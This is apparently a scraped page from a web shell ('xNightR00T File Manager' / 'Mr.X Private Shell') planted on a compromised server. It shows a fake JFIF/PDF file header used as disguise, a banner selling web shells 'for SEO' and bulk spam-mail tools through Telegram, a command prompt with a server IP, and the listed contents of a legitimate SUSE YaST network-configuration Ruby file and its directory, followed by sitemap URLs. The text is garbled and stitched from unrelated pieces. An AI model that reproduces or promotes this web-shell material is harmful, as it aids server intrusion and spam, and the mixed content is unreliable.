xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# ***************************************************************************
#
# Copyright (c) 2012 Novell, Inc.
# All Rights Reserved.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.   See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail,
# you may find current contact information at www.novell.com
#
# **************************************************************************
# File:	include/network/lan/wizards.ycp
# Package:	Network configuration
# Summary:	Network cards configuration wizards
# Authors:	Michal Svec <msvec@suse.cz>
#
module Yast
  module NetworkLanWizardsInclude
    def initialize_network_lan_wizards(include_target)
      Yast.import "UI"

      textdomain "network"

      Yast.import "Arch"
      Yast.import "Label"
      Yast.import "Lan"
      Yast.import "Sequencer"
      Yast.import "Wizard"

      Yast.include include_target, "network/routines.rb"
      Yast.include include_target, "network/lan/address.rb"
      Yast.include include_target, "network/lan/complex.rb"
      Yast.include include_target, "network/lan/dhcp.rb"
      Yast.include include_target, "network/lan/hardware.rb"
      Yast.include include_target, "network/lan/wireless.rb"
      Yast.include include_target, "network/services/dns.rb"
      Yast.include include_target, "network/services/host.rb"
    end

    # Whole configuration of network
    # @return successfully finished
    def LanSequence
      aliases = {
        "read"  => [-> { ReadDialog() }, true],
        "main"  => -> { MainSequence("") },
        "write" => [-> { WriteDialog() }, true]
      }

      if Mode.installation || Mode.update
        aliases["packages"] = [-> { add_pkgs_to_proposal(Lan.Packages) }, true]

        sequence = {
          "ws_start" => "read",
          "read"     => { abort: :abort, back: :back, next: "main" },
          "main"     => { abort: :abort, back: :back, next: "packages" },
          "packages" => { abort: :abort, back: :back, next: "write" },
          "write"    => { abort: :abort, back: :back, next: :next }
        }

        Wizard.OpenNextBackDialog
      else
        aliases["packages"] = [-> { PackagesInstall(Lan.Packages) }, true]

        sequence = {
          "ws_start" => "read",
          "read"     => { abort: :abort, next: "main" },
          "main"     => { abort: :abort, next: "packages" },
          "packages" => { abort: :abort, next: "write" },
          "write"    => { abort: :abort, next: :next }
        }

        Wizard.OpenCancelOKDialog
        Wizard.SetDesktopTitleAndIcon("lan")
      end

      ret = Sequencer.Run(aliases, sequence)

      UI.CloseDialog
      ret
    end

    # Whole configuration of network but without reading and writing.
    # For use with autoinstallation and proposal
    # @param [String] mode if "proposal", NM dialog may be skipped
    # @return sequence result
    def LanAutoSequence(mode)
      caption = _("Network Card Configuration")
      contents = Label(_("Initializing..."))

      Wizard.CreateDialog
      Wizard.SetDesktopIcon("lan")
      Wizard.SetContentsButtons(
        caption,
        contents,
        "",
        Label.BackButton,
        Label.NextButton
      )

      ret = MainSequence(mode)

      UI.CloseDialog
      ret
    end

    def MainSequence(mode)
      aliases = {
        "global"    => -> { MainDialog("global") },
        "overview"  => -> { MainDialog("overview") },
        "add"       => [-> { NetworkCardSequence("add") }, true],
        "edit"      => [-> { NetworkCardSequence("edit") }, true],
        "init_s390" => [-> { NetworkCardSequence("init_s390") }, true]
      }

      start = "overview"
      # the NM decision is already present in the proposal.
      # see also #148485
      start = "global" if mode == "proposal"
      sequence = {
        "ws_start"  => start,
        "global"    => {
          abort: :abort,
          next:  :next,
          add:   "add",
          edit:  "edit"
        },
        "overview"  => {
          abort:     :abort,
          next:      :next,
          add:       "add",
          edit:      "edit",
          init_s390: "init_s390"
        },
        "add"       => { abort: :abort, next: "overview" },
        "edit"      => { abort: :abort, next: "overview" },
        "init_s390" => { abort: :abort, next: "overview" }
      }

      Sequencer.Run(aliases, sequence)
    end

    def NetworkCardSequence(action)
      aliases = {
        "hardware" => -> { HardwareDialog() },
        "address"  => -> { AddressSequence("") },
        "s390"     => -> { S390Dialog() }
      }

      ws_start = case action
      when "add"
        "hardware"
      when "init_s390"
        # s390 may require configuring additional modules. Which
        # enables IBM net cards for linux. Basicaly it creates
        # linux devices with common api (e.g. eth0, hsi1, ...)
        "s390"
      else
        "address"
      end

      Builtins.y2milestone("ws_start %1", ws_start)

      sequence = {
        "ws_start" => ws_start,
        "hardware" => { abort: :back, next: "address" },
        "address"  => { abort: :back, next: :next },
        "s390"     => { abort: :abort, next: "address" }
      }

      Sequencer.Run(aliases, sequence)
    end

    def AddressSequence(which)
      aliases = {
        "address"     => -> { AddressDialog() },
        "hosts"       => -> { HostsMainDialog(false) },
        "s390"        => -> { S390Dialog() },
        "wire"        => -> { WirelessDialog() },
        "expert"      => -> { WirelessExpertDialog() },
        "keys"        => -> { WirelessKeysDialog() },
        "eap"         => -> { WirelessWpaEapDialog() },
        "eap-details" => -> { WirelessWpaEapDetailsDialog() },
        "commit"      => [-> { Commit() }, true]
      }

      ws_start = which == "wire" ? "wire" : "address" # "changedefaults";
      sequence = {
        "ws_start"    => ws_start,
        # 	"changedefaults" : $[
        # 	    `next	: "address",
        # 	],
        "address"     => {
          abort:    :abort,
          next:     "commit",
          wire:     "wire",
          hosts:    "hosts",
          s390:     "s390",
          hardware: :hardware
        },
        "s390"        => { abort: :abort, next: "address" },
        "hosts"       => { abort: :abort, next: "address" },
        "wire"        => {
          next:   "commit",
          expert: "expert",
          keys:   "keys",
          eap:    "eap",
          abort:  :abort
        },
        "expert"      => { next: "wire", abort: :abort },
        "keys"        => { next: "wire", abort: :abort },
        "eap"         => {
          next:    "commit",
          details: "eap-details",
          abort:   :abort
        },
        "eap-details" => { next: "eap", abort: :abort },
        "commit"      => { next: :next }
      }

      Sequencer.Run(aliases, sequence)
    end
  end
end

Filemanager

Name Type Size Permission Actions
address.rb File 52.49 KB 0644
bridge.rb File 3.3 KB 0644
cards.rb File 17.29 KB 0644
cmdline.rb File 9.84 KB 0644
complex.rb File 18.12 KB 0644
dhcp.rb File 4.77 KB 0644
hardware.rb File 37.49 KB 0644
help.rb File 27.94 KB 0644
s390.rb File 3.05 KB 0644
udev.rb File 3.36 KB 0644
virtual.rb File 8.04 KB 0644
wireless.rb File 45.08 KB 0644
wizards.rb File 7.26 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml